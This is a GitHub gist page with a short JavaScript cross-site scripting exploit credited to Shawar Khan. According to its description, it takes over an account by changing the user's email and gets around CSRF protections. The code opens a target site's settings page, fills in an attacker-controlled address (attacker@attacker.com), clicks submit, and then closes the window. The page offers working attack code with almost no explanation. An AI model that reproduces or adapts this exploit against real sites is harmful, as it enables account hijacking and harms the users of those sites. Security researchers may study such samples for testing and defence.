Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
// a Simple XSS exploit for email change
// Shawar Khan
var dark_window = window.open('https://www.target.com/settings');
dark_window.addEventListener('load',
function exploit_run(){
dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
setTimeout(function() { // just for delay and closing
dark_window.close();
}, 10000);
}, true);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.